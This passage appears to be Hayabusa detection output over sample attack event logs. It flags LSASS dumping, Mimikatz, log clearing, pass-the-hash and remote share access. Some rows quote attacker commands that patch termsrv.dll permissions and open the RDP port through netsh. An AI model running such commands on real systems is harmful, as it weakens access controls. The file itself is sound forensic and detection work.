Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx -2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx -2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" : Path: C:\Windows\System32\cmd.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o : Path: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe : User: PC04\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Registry Modification,,rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,RDP Sensitive Settings Changed,,rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow : Path: C:\Windows\System32\netsh.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Netsh Port or Application Allowed,,rules/sigma/process_creation/win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Netsh RDP Port Opening,,rules/sigma/process_creation/win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" : Path: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.907 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll : Path: C:\Windows\System32\takeown.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.917 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) : Path: C:\Windows\System32\icacls.exe : User: PC04\IEUser : Parent Command: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,File or Folder Permissions Modifications,,rules/sigma/process_creation/win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx -2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 220 : Path: C:\Windows\System32\UI0Detect.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx -2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: PC04\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx -2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,informational,Logon Type 9 - NewCredentials,User: user01 : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x4530f0f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: user01 : LogonID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx -2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Explicit Logon: Suspicious Process,Source User: user01 : Target User: administrator : IP Address: - : Process: C:\Windows\System32\wbem\WMIC.exe : Target Server: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx -2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 